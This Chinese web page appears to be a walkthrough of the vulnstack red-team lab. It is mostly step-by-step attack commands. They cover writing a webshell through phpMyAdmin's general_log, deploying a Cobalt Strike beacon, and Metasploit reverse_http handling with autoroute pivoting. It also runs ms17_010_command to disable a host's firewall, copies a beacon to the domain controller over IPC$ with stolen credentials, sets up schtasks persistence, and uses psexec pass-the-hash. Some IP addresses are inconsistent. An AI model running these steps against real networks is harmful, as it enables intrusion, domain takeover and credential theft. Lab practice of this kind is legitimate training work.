当前位置：首页 > news >正文

vulnstack红队实战一

news 2026/5/12 18:12:14

拓扑结构

web服务器（win7）：192.168.77.129 192.168.52.143

域控（win2008）：192.168.52.138

域成员（win2003）192.168.52.144

攻击机：192.168.77.128

外网渗透

信息打点

发现80，3306端口访问80端口

一个php探针，那么就会存在php的web服务，我们可以做个目录扫描，寻找一下入口

扫描到phpmyadmin，phpinfo等

phpinfo中得到web目录的绝对路径

Getshell

弱口令(root:root)登录进入phpmyadmin

值为null，那就无法直接写shell

通过日志的方法将shell写到web服务目录

set global general_log = on; set global general_log_file = "C:/phpStudy/WWW/shell.php";

先执行一个select "";

就会被存入C:/phpStudy/WWW/shell.php

连接此shell

CS创建后门程序上传

提权：

右键上线的主机--->**Access**--->**Elevate**--->选择**teamserver**对应的**Listener**--->点击Launch

内网渗透

执行shell ipconfig发现双网卡

内网域为192.168.52.0/24 已控制主机为192.168.52.143

shell systeminfo发现域名god.org

net view探测ip

shell net time /domain

一般而言域内时间服务器就是域控

验证

域
- **god.org**
域内机器
- 上线机器（win7）
 - **192.168.52.143**
- 域控/域登录服务器
 - **192.168.52.138**
 - **owa.god.org**
- 另一个域内机器
 - **192.168.52.141**

横向移动

需要借助msf进行渗透，所以将cs与msf建立连接

新建一个listener将流量转发至攻击机

攻击机监听被控主机

use exploit/multi/handler

set payload windows/meterpreter/reverse_http

set lhost 192.168.72.129

set lport 8000

exploit

配置路由

run get_local_subnets #查看网段/子网

run autoroute -s 192.168.52.0/24 #添加路由

run autoroute -p #查看路由

background #转入后台运行

子网为**192.168.52.0/24**的流量都会通过刚刚建立的**Session 2**（win7）来路由

扫描主机144

use auxiliary/scanner/portscan/tcp

set rhosts 192.168.52.141

set ports 80,135,139,3306,3389,445 #也可以0-65535

run

这里不知道为什么没有扫描到，可能是环境的问题

此处445端口开放可能存在ms17-010漏洞

use auxiliary/admin/smb/ms17_010_command

set rhosts 192.168.52.141

set command "netsh advfirewall set allprofiles state off"

exploit

这里关闭防火墙

上面一样的流程更换执行命令为ipconfig /all

set command "ipconfig /all"

执行成功拿下内网主机141权限

抓取域内账号密码

域内主机通过ipc连接

shell net use \192.168.52.138\ipc$ "得到的密码" /user:god\administrator

先上传一个木马到域内主机，然后域内主机复制到域控

shell copy b.exe \192.168.52.138\c$

创建计划任务运行木马

shell schtasks /create /s 192.168.52.138 /tn test /sc onstart /tr c:\beacon.exe /ru system /f

shell schtasks /run /s 192.168.52.138 /i /tn "test"

link 192.168.56.138

获取shell

哈希传递法

cs左上角点击Cobalt Strike => 可视化 => 目标列表 => 选择要上线设备(192.168.52.135) => 点击Jump => 选择psexec64

注意使用pipe监听

查看全文

http://www.jsqmd.com/news/318720/

全球首次突破异形框定位难题，百度开源全新OCR模型 PaddleOCR-VL-1.5

智能指针详解

PVE 9.0 定制 Debian 13 镜像支持 Cloud-Init 敏捷部署虚拟机【模板篇】

Java面试中的异常继承难题：自定义Exception避坑指南

Spring Boot的项目创建

基于SpringBoot的房屋租售系统毕业论文+PPT（附源代码+演示视频）

销售实战资源合集

使用 NanUI 快速创建具有现代用户界面的 WinForm 应用程序

AI运维专家圆桌：新兴技术类别的诞生

ServiceNow与Anthropic达成多年合作协议

一款基于 .NET Avalonia 开源免费、快速、跨平台的图片查看器

【课程设计/毕业设计】基于微信小程序的医院设备管理及报修系统基于springboot的医院设备管理及报修小程序的设计与实现【附源码、数据库、万字文档】

AI工具存在严重安全脆弱性，治理刻不容缓

小程序计算机毕设之基于SpringBoot+微信小程序的微信医院医疗设备管理系统管理系统基于springboot的医院设备管理及报修小程序的设计与实现（完整前后端代码+说明文档+LW，调试定制等）

SolarWinds修复Web Help Desk四个关键漏洞

小程序毕设项目：基于springboot的医院设备管理及报修小程序的设计与实现(源码+文档，讲解、调试运行，定制等)

为啥大厂 FPS 进对局不立刻清空局外缓存，而是打完再清？（大白话超长版）

【毕业设计】基于springboot的医院设备管理及报修小程序的设计与实现(源码+文档+远程调试，全bao定制等)

大数据架构设计：非结构化数据处理系统搭建

《明日方舟：终末地》：披着二游皮的基建模拟器

Redis 与大数据 NoSQL 数据库的融合应用

“抖音崩了”冲上热搜，无法正常搜索，刷视频功能未受影响

提示工程架构师：如何用数据驱动提示优化，提升用户满意度？

weixin196运动健康小程序SpringBoot(源码)_kaic

【计算机毕业设计案例】基于springboot医院固定资产设备维修报修系统基于springboot的医院设备管理及报修小程序的设计与实现(程序+文档+讲解+定制)

大数据时序分析，这些要点你掌握了吗？

掌握大数据领域Lambda架构的性能测试方法

AI大模型应用开发从理论再到实践：AI大模型应用开发学习路线，提升核心竞争力，非常详细建议收藏